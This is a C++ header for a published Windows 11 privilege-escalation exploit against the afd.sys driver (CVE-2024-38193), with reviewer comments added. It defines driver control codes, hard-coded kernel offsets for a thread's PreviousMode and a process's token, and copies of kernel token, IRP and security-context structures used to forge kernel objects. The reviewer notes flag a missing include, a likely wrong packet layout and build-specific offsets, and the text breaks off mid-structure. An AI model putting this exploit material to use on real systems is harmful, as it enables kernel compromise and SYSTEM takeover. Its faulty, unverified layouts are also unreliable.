// NOTE(review): the seven banner lines that follow are Exploit-DB metadata, not
// preprocessor directives ("# Exploit Title:" is an invalid directive in C/C++);
// comment them out with // or delete them before this header is compiled.
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193

/*
 * Kernel-structure mirrors and constants for the CVE-2024-38193 (afd.sys,
 * "Ancillary Function Driver for WinSock") local privilege-escalation PoC named
 * in the banner above. Everything in this header is layout data: AFD / named-pipe
 * control codes, _TOKEN / _EPROCESS / _KTHREAD field offsets, and hand-copied
 * ntoskrnl structures (the trailing //0x.. comments are the field offsets the
 * copies were checked against; the //0x.. bytes (sizeof) comments give each
 * structure's expected size).
 *
 * NOTE(review): all of this is build-specific. The banner says it was tested on
 * Windows 11 23H2 x64; the OFFSET_* values and the struct layouts are compiled
 * in, not resolved at runtime, so on any other build the exploit would read or
 * write kernel memory at the wrong offsets (most likely a bug-check rather than
 * a clean failure). Re-derive the offsets from the target build's symbols
 * before use, and treat this header as something to verify, not a reference.
 *
 * NOTE(review): despite the .h name this is C++ (alignas(16), __declspec(align)),
 * and several `typedef struct X { ... };` declarations below omit the typedef
 * name, so they only introduce the struct tag (MSVC accepts this with a warning;
 * other compilers may reject it).
 */
#pragma once
#include "ntstatus.h"
#include "Windows.h"
// NOTE(review): the header name on the next #include was lost when the page was
// extracted (the angle-bracketed name was stripped). Restore it from the original
// submission: this file uses SOCKADDR_IN / sockaddr_in (MY_AFD_CONNECT_INFO,
// _AFD_BIND_DATA) without declaring them, so presumably a Winsock header.
#include
// Links ntdll.lib so the Nt*/Rtl* native calls made by the .cpp resolve.
#pragma comment(lib, "ntdll.lib")

// Upper / lower 32 bits of a 64-bit value (LODWORD truncates, by design).
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

// EA name afd.sys expects in the socket-create packet: exactly 15 characters,
// which is why _AFD_CREATE_PACKET.EaName below is CHAR[15].
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"

// AFD and named-pipe (NPFS) control codes used by the PoC. The names are the
// author's; the values are written out rather than built with CTL_CODE().
// Style: FSCTL_PIPE_INTERNAL_WRITE lacks the LL suffix the others carry.
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

// Native-API constants. NOTE(review): these (and UNICODE_STRING /
// OBJECT_ATTRIBUTES further down) duplicate names from ntdef.h / winternl.h;
// including either of those headers alongside this one would cause
// redefinition errors.
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

// Field offsets inside the kernel _TOKEN object. They agree with the //0x..
// annotations on struct _TOKEN below (VariablePart 0x490, Privileges 0x40,
// PrimaryGroup 0xa8, DynamicPart 0xb0, DefaultDacl 0xb8).
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
// Offsets into structures that are NOT mirrored in this header: presumably
// _KTHREAD.PreviousMode and _EPROCESS.ActiveProcessLinks / _EPROCESS.Token.
// NOTE(review): nothing here cross-checks these three; confirm them against the
// target build's symbols, as a wrong value here corrupts arbitrary kernel memory.
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
// (HANDLE)-2, the NtCurrentThread() pseudo-handle value.
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE

// NOTE(review): this diverges from the SDK's IO_STATUS_BLOCK: Status is DWORD
// (SDK: NTSTATUS, signed) and Information is DWORD* (SDK: ULONG_PTR). Both are
// 8 bytes on x64 so the 16-byte layout still matches, but the typedef names no
// alias, so only `struct IO_STATUS_BLOCK` is usable. _IRP below embeds this tag
// (IoStatus) and also points to an undeclared `struct _IO_STATUS_BLOCK`
// (UserIosb) -- two unrelated types.
typedef struct IO_STATUS_BLOCK {
    union {
        DWORD Status;
        PVOID Pointer;
    };
    DWORD* Information;
};

// The next two types exist only so that _IO_STACK_LOCATION.Parameters.Power
// has the right size.
//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT {
    union {
        struct {
            ULONG Reserved1 : 8; //0x0
            ULONG TargetSystemState : 4; //0x0
            ULONG EffectiveSystemState : 4; //0x0
            ULONG CurrentSystemState : 4; //0x0
            ULONG IgnoreHibernationPath : 1; //0x0
            ULONG PseudoTransition : 1; //0x0
            ULONG KernelSoftReboot : 1; //0x0
            ULONG DirectedDripsTransition : 1; //0x0
            ULONG Reserved2 : 8; //0x0
        };
        ULONG ContextAsUlong; //0x0
    };
};

//0x4 bytes (sizeof)
union _POWER_STATE {
    enum _SYSTEM_POWER_STATE SystemState; //0x0
    enum _DEVICE_POWER_STATE DeviceState; //0x0
};

// Full IRP stack location (0x48 bytes). The PoC keeps a crafted one in
// mm.crafted_arbitrary_io_stack_location (see struct mm at the bottom); how it
// is used is in the .cpp, not here.
//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION {
    UCHAR MajorFunction; //0x0
    UCHAR MinorFunction; //0x1
    UCHAR Flags; //0x2
    UCHAR Control; //0x3
    union {
        struct {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT FileAttributes; //0x18
            USHORT ShareAccess; //0x1a
            ULONG EaLength; //0x20
        } Create; //0x8
        struct {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
        } CreatePipe; //0x8
        struct {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
        } CreateMailslot; //0x8
        struct {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Read; //0x8
        struct {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Write; //0x8
        struct {
            ULONG Length; //0x8
            struct _UNICODE_STRING* FileName; //0x10
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
            ULONG FileIndex; //0x20
        } QueryDirectory; //0x8
        struct {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
        } NotifyDirectory; //0x8
        struct {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18
        } NotifyDirectoryEx; //0x8
        struct {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
        } QueryFile; //0x8
        struct {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
            struct _FILE_OBJECT* FileObject; //0x18
            union {
                struct {
                    UCHAR ReplaceIfExists; //0x20
                    UCHAR AdvanceOnly; //0x21
                };
                ULONG ClusterCount; //0x20
                VOID* DeleteHandle; //0x20
            };
        } SetFile; //0x8
        struct {
            ULONG Length; //0x8
            VOID* EaList; //0x10
            ULONG EaListLength; //0x18
            ULONG EaIndex; //0x20
        } QueryEa; //0x8
        struct {
            ULONG Length; //0x8
        } SetEa; //0x8
        struct {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } QueryVolume; //0x8
        struct {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } SetVolume; //0x8
        struct {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG FsControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } FileSystemControl; //0x8
        struct {
            union _LARGE_INTEGER* Length; //0x8
            ULONG Key; //0x10
            union _LARGE_INTEGER ByteOffset; //0x18
        } LockControl; //0x8
        struct {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG IoControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } DeviceIoControl; //0x8
        struct {
            ULONG SecurityInformation; //0x8
            ULONG Length; //0x10
        } QuerySecurity; //0x8
        struct {
            ULONG SecurityInformation; //0x8
            VOID* SecurityDescriptor; //0x10
        } SetSecurity; //0x8
        struct {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } MountVolume; //0x8
        struct {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } VerifyVolume; //0x8
        struct {
            struct _SCSI_REQUEST_BLOCK* Srb; //0x8
        } Scsi; //0x8
        struct {
            ULONG Length; //0x8
            VOID* StartSid; //0x10
            struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
            ULONG SidListLength; //0x20
        } QueryQuota; //0x8
        struct {
            ULONG Length; //0x8
        } SetQuota; //0x8
        struct {
            enum _DEVICE_RELATION_TYPE Type; //0x8
        } QueryDeviceRelations; //0x8
        struct {
            struct _GUID* InterfaceType; //0x8
            USHORT Size; //0x10
            USHORT Version; //0x12
            struct _INTERFACE* Interface; //0x18
            VOID* InterfaceSpecificData; //0x20
        } QueryInterface; //0x8
        struct {
            struct _DEVICE_CAPABILITIES* Capabilities; //0x8
        } DeviceCapabilities; //0x8
        struct {
            struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8
        } FilterResourceRequirements; //0x8
        struct {
            ULONG WhichSpace; //0x8
            VOID* Buffer; //0x10
            ULONG Offset; //0x18
            ULONG Length; //0x20
        } ReadWriteConfig; //0x8
        struct {
            UCHAR Lock; //0x8
        } SetLock; //0x8
        struct {
            enum BUS_QUERY_ID_TYPE IdType; //0x8
        } QueryId; //0x8
        struct {
            enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
            ULONG LocaleId; //0x10
        } QueryDeviceText; //0x8
        struct {
            UCHAR InPath; //0x8
            UCHAR Reserved[3]; //0x9
            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
        } UsageNotification; //0x8
        struct {
            enum _SYSTEM_POWER_STATE PowerState; //0x8
        } WaitWake; //0x8
        struct {
            struct _POWER_SEQUENCE* PowerSequence; //0x8
        } PowerSequence; //0x8
        struct {
            union {
                ULONG SystemContext; //0x8
                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8
            };
            enum _POWER_STATE_TYPE Type; //0x10
            union _POWER_STATE State; //0x18
            enum POWER_ACTION ShutdownType; //0x20
        } Power; //0x8
        struct {
            struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
        } StartDevice; //0x8
        struct {
            ULONGLONG ProviderId; //0x8
            VOID* DataPath; //0x10
            ULONG BufferSize; //0x18
            VOID* Buffer; //0x20
        } WMI; //0x8
        struct {
            VOID* Argument1; //0x8
            VOID* Argument2; //0x10
            VOID* Argument3; //0x18
            VOID* Argument4; //0x20
        } Others; //0x8
    } Parameters; //0x8
    struct _DEVICE_OBJECT* DeviceObject; //0x28
    struct _FILE_OBJECT* FileObject; //0x30
    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38
    VOID* Context; //0x40
}IO_STACK_LOCATION;

// Embedded in _IRP.Tail (as DeviceQueueEntry).
//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY {
    struct _LIST_ENTRY DeviceListEntry; //0x0
    ULONG SortKey; //0x10
    UCHAR Inserted; //0x14
};

// Embedded in _IRP.Tail (as Apc).
//0x58 bytes (sizeof)
struct _KAPC {
    UCHAR Type; //0x0
    UCHAR AllFlags; //0x1
    UCHAR Size; //0x2
    UCHAR SpareByte1; //0x3
    ULONG SpareLong0; //0x4
    struct _KTHREAD* Thread; //0x8
    struct _LIST_ENTRY ApcListEntry; //0x10
    VOID* Reserved[3]; //0x20
    VOID* NormalContext; //0x38
    VOID* SystemArgument1; //0x40
    VOID* SystemArgument2; //0x48
    CHAR ApcStateIndex; //0x50
    CHAR ApcMode; //0x51
    UCHAR Inserted; //0x52
};

// Full IRP (0xd0 bytes). The PoC keeps a crafted one in mm.crafted_irp.
// Tail.Overlay.CurrentStackLocation (0xb8) points at an _IO_STACK_LOCATION.
//0xd0 bytes (sizeof)
struct _IRP {
    SHORT Type; //0x0
    USHORT Size; //0x2
    USHORT AllocationProcessorNumber; //0x4
    USHORT Reserved; //0x6
    struct _MDL* MdlAddress; //0x8
    ULONG Flags; //0x10
    union {
        struct _IRP* MasterIrp; //0x18
        LONG IrpCount; //0x18
        VOID* SystemBuffer; //0x18
    } AssociatedIrp; //0x18
    struct _LIST_ENTRY ThreadListEntry; //0x20
    struct IO_STATUS_BLOCK IoStatus; //0x30
    CHAR RequestorMode; //0x40
    UCHAR PendingReturned; //0x41
    CHAR StackCount; //0x42
    CHAR CurrentLocation; //0x43
    UCHAR Cancel; //0x44
    UCHAR CancelIrql; //0x45
    CHAR ApcEnvironment; //0x46
    UCHAR AllocationFlags; //0x47
    union {
        struct _IO_STATUS_BLOCK* UserIosb; //0x48
        VOID* IoRingContext; //0x48
    };
    struct _KEVENT* UserEvent; //0x50
    union {
        struct {
            union {
                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58
                VOID* IssuingProcess; //0x58
            };
            union {
                VOID* UserApcContext; //0x60
                struct _IORING_OBJECT* IoRing; //0x60
            };
        } AsynchronousParameters; //0x58
        union _LARGE_INTEGER AllocationSize; //0x58
    } Overlay; //0x58
    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68
    VOID* UserBuffer; //0x70
    union {
        struct {
            union {
                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
                VOID* DriverContext[4]; //0x78
            };
            struct _ETHREAD* Thread; //0x98
            CHAR* AuxiliaryBuffer; //0xa0
            struct _LIST_ENTRY ListEntry; //0xa8
            union {
                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                ULONG PacketType; //0xb8
            };
            struct _FILE_OBJECT* OriginalFileObject; //0xc0
            VOID* IrpExtension; //0xc8
        } Overlay; //0x78
        struct _KAPC Apc; //0x78
        VOID* CompletionKey; //0x78
    } Tail; //0x78
};

// TDI-style transport address, presumably for the AFD bind/connect buffers.
// Address[1] / Address[1] are variable-length trailers sized by the caller.
typedef struct _TA_ADDRESS {
    USHORT AddressLength;
    USHORT AddressType;
    UCHAR Address[1];
}TA_ADDRESS;

typedef struct _TRANSPORT_ADDRESS {
    LONG TAAddressCount;
    TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;

// Native-API types for NtCreateFile/NtOpenFile on AFD_DEVICE_NAME
// (same layout as the winternl.h definitions they shadow).
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

// Output of NtQuerySystemInformation for the two classes declared in
// SYSTEM_INFORMATION_CLASS below (SystemModuleInformation = 11 gives loaded
// kernel module bases; SystemExtendedHandleInformation = 64 gives the kernel
// Object pointer behind every handle). Presumably the PoC's address leaks.
// The trailing [1] arrays are Count-prefixed and sized by the caller.
typedef struct _SYSTEM_MODULE_ENTRY {
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

// EA buffer passed to NtCreateFile on \Device\Afd to open a raw socket: a
// FILE_FULL_EA_INFORMATION header carrying AfdOpenPacket as the name, followed
// by the AFD create packet as the value.
// NOTE(review): the SDK's FILE_FULL_EA_INFORMATION declares Flags as UCHAR and
// is followed by a NUL after the 15-byte name, so the EA value starts at offset
// 24. With `WORD Flags` here, EaNameLength lands at 6, EaValueLength at 8 and
// EndpointFlags at 28, which looks like it would not match what afd.sys parses.
// Confirm how the .cpp fills this buffer (by field or by raw offset) before
// trusting the layout.
typedef struct _AFD_CREATE_PACKET {
    //FILE_FULL_EA_INFORMATION
    ULONG NextEntryOffset;
    WORD Flags;
    UCHAR EaNameLength;
    USHORT EaValueLength;
    CHAR EaName[15];
    //AFD_CREATE_PACKET
    ULONG EndpointFlags;
    ULONG GroupID;
    ULONG AddressFamily;
    ULONG SocketType;
    ULONG Protocol;
    ULONG SizeOfTransportName;
    wchar_t TransportName[16];
    //UCHAR Unkown;
} AFD_CREATE_PACKET;

// Information classes used by the PoC. ThreadImpersonationToken (5) is the
// NtSetInformationThread class that installs an impersonation token on a thread.
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
enum SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemExtendedHandleInformation = 64 };
typedef enum EVENT_TYPE { NotificationEvent, SynchronizationEvent };

// Input buffers for IOCTL_AFD_BIND / IOCTL_AFD_CONNECT / IOCTL_AFD_LISTEN.
// Fields named Unknown/tmp*/const_* are reverse-engineered placeholders, not
// documented AFD fields. MY_AFD_CONNECT_INFO requires C++ (alignas).
typedef struct _AFD_BIND_DATA {
    ULONG ShareType;
    SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;

typedef struct alignas(16) MY_AFD_CONNECT_INFO {
    __int64 UseSan;
    __int64 hNtSock1;
    __int64 Unknown;
    __int32 tmp6;
    WORD const_16;
    sockaddr_in bind;
};

// Fake AFD data-queue entry with a 0x77FD0-byte (~480 KiB) payload area;
// security_client_context presumably points at a _SECURITY_CLIENT_CONTEXT
// (declared below). NOTE(review): at this size do not instantiate it on the
// stack -- allocate it on the heap.
typedef struct FAKE_DATA_ENTRY_QUEUE {
    DWORD tmp;
    LIST_ENTRY nextQueue;
    __int64 unknown;
    PVOID security_client_context;
    __int64 unknown2;
    __int64 sizeOfData;
    char DATA[0x77FD0];
};

typedef struct _AFD_LISTEN_INFO {
    ULONG unknown;
    __int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;

// Kernel SECURITY_CLIENT_CONTEXT: ClientToken is the kernel pointer to the
// impersonation token. struct mm holds both a security_client_context and a
// fakeToken; this header does not show how they are related.
typedef struct _SECURITY_CLIENT_CONTEXT {
    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    unsigned __int8 DirectlyAccessClientToken;
    unsigned __int8 DirectAccessEffectiveOnly;
    unsigned __int8 ServerIsRemote;
    _TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;

// ERESOURCE and its owner entry; _TOKEN.TokenLock (0x30) points at one of these
// and struct mm keeps its own copy (mm.TokenLock).
struct __declspec(align(8)) _OWNER_ENTRY {
    unsigned __int64 OwnerThread;
    DWORD ___u1;
};

//0x68 bytes (sizeof)
typedef struct _ERESOURCE {
    struct _LIST_ENTRY SystemResourcesList; //0x0
    struct _OWNER_ENTRY* OwnerTable; //0x10
    SHORT ActiveCount; //0x18
    union {
        USHORT Flag; //0x1a
        struct {
            UCHAR ReservedLowFlags; //0x1a
            UCHAR WaiterPriority; //0x1b
        };
    };
    VOID* SharedWaiters; //0x20
    VOID* ExclusiveWaiters; //0x28
    struct _OWNER_ENTRY OwnerEntry; //0x30
    ULONG ActiveEntries; //0x40
    ULONG ContentionCount; //0x44
    ULONG NumberOfSharedWaiters; //0x48
    ULONG NumberOfExclusiveWaiters; //0x4c
    VOID* Reserved2; //0x50
    union {
        VOID* Address; //0x58
        ULONGLONG CreatorBackTraceIndex; //0x58
    };
    ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;

// The next four types are only needed as members of
// _SEP_LOGON_SESSION_REFERENCES and _OBJECT_HEADER below.
//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK {
    union {
        struct {
            ULONGLONG Locked : 1; //0x0
            ULONGLONG Waiting : 1; //0x0
            ULONGLONG Waking : 1; //0x0
            ULONGLONG MultipleShared : 1; //0x0
            ULONGLONG Shared : 60; //0x0
        };
        ULONGLONG Value; //0x0
        VOID* Ptr; //0x0
    };
};

//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE {
    struct _EX_PUSH_LOCK Lock; //0x0
    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};

//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF {
    union {
        ULONGLONG Count; //0x0
        VOID* Ptr; //0x0
    };
};

//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK {
    struct _LIST_ENTRY RevocationInfos; //0x0
    struct _EX_PUSH_LOCK Lock; //0x10
    struct _EX_RUNDOWN_REF Rundown; //0x18
};

// Target of _TOKEN.LogonSession (declared as a plain void* there);
// mm.LogonSession keeps the PoC's copy.
//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES {
    struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
    struct _LUID LogonId; //0x8
    struct _LUID BuddyLogonId; //0x10
    LONGLONG ReferenceCount; //0x18
    ULONG Flags; //0x20
    struct _DEVICE_MAP* pDeviceMap; //0x28
    VOID* Token; //0x30
    struct _UNICODE_STRING AccountName; //0x38
    struct _UNICODE_STRING AuthorityName; //0x48
    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
    struct _EX_PUSH_LOCK SharedDataLock; //0x68
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70
    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
    struct _EJOB* ServerSilo; //0xa0
    struct _LUID SiblingAuthId; //0xa8
    struct _LIST_ENTRY TokenList; //0xb0
};

// Members referenced from _TOKEN (pSecurityAttributes, TokenSidValues,
// Privileges, AuditPolicy); mm keeps its own pSecurityAttributes and
// TokenSidValues.
//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION {
    ULONG SecurityAttributeCount; //0x0
    struct _LIST_ENTRY SecurityAttributesList; //0x8
    ULONG WorkingSecurityAttributeCount; //0x18
    struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;

//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK {
    ULONG BlockLength; //0x0
    LONGLONG ReferenceCount; //0x8
    ULONG SidCount; //0x10
    ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;

// Present / Enabled / EnabledByDefault privilege bitmasks at _TOKEN+0x40
// (OFFSET_IN_TOKEN_TOKEN_PRIVILEGES).
//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES {
    ULONGLONG Present; //0x0
    ULONGLONG Enabled; //0x8
    ULONGLONG EnabledByDefault; //0x10
};

//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY {
    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
    UCHAR PolicySetStatus; //0x1e
};

// Kernel _TOKEN object body (0x498 bytes). mm.fakeToken is built from this.
// The fields the OFFSET_IN_TOKEN_* constants address are Privileges (0x40),
// PrimaryGroup (0xa8), DynamicPart (0xb0), DefaultDacl (0xb8) and
// VariablePart (0x490); mm mirrors several of them (VariablePartDefaultDacl,
// PrimaryGroup, TokenLock, TokenSidValues).
//0x498 bytes (sizeof)
struct _TOKEN {
    struct _TOKEN_SOURCE TokenSource; //0x0
    struct _LUID TokenId; //0x10
    struct _LUID AuthenticationId; //0x18
    struct _LUID ParentTokenId; //0x20
    union _LARGE_INTEGER ExpirationTime; //0x28
    struct _ERESOURCE* TokenLock; //0x30
    struct _LUID ModifiedId; //0x38
    struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
    struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
    ULONG SessionId; //0x78
    ULONG UserAndGroupCount; //0x7c
    ULONG RestrictedSidCount; //0x80
    ULONG VariableLength; //0x84
    ULONG DynamicCharged; //0x88
    ULONG DynamicAvailable; //0x8c
    ULONG DefaultOwnerIndex; //0x90
    struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
    struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
    VOID* PrimaryGroup; //0xa8
    ULONG* DynamicPart; //0xb0
    struct _ACL* DefaultDacl; //0xb8
    enum _TOKEN_TYPE TokenType; //0xc0
    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
    ULONG TokenFlags; //0xc8
    UCHAR TokenInUse; //0xcc
    ULONG IntegrityLevelIndex; //0xd0
    ULONG MandatoryPolicy; //0xd4
    void* LogonSession; //0xd8
    struct _LUID OriginatingLogonSession; //0xe0
    struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308
    VOID* Package; //0x310
    struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
    ULONG CapabilityCount; //0x320
    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448
    VOID* TrustLevelSid; //0x450
    struct _TOKEN* TrustLinkedToken; //0x458
    VOID* IntegrityLevelSidValue; //0x460
    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
    VOID* SessionObject; //0x488
    ULONGLONG VariablePart; //0x490
};

// Object-manager header (0x30 bytes) immediately followed by a _TOKEN body,
// i.e. the shape of a token object as it sits in the pool. Note the sizeof
// comment (0x38) is for the generic header; with the _TOKEN body inlined this
// struct is much larger. mm.sizeOfClientTokenAndObjectHeader presumably covers
// header + body together.
//0x38 bytes (sizeof)
struct _OBJECT_HEADER {
    LONGLONG PointerCount; //0x0
    union {
        LONGLONG HandleCount; //0x8
        VOID* NextToFree; //0x8
    };
    struct _EX_PUSH_LOCK Lock; //0x10
    UCHAR TypeIndex; //0x18
    union {
        UCHAR TraceFlags; //0x19
        struct {
            UCHAR DbgRefTrace : 1; //0x19
            UCHAR DbgTracePermanent : 1; //0x19
        };
    };
    UCHAR InfoMask; //0x1a
    union {
        UCHAR Flags; //0x1b
        struct {
            UCHAR NewObject : 1; //0x1b
            UCHAR KernelObject : 1; //0x1b
            UCHAR KernelOnlyAccess : 1; //0x1b
            UCHAR ExclusiveObject : 1; //0x1b
            UCHAR PermanentObject : 1; //0x1b
            UCHAR DefaultSecurityQuota : 1; //0x1b
            UCHAR SingleHandleEntry : 1; //0x1b
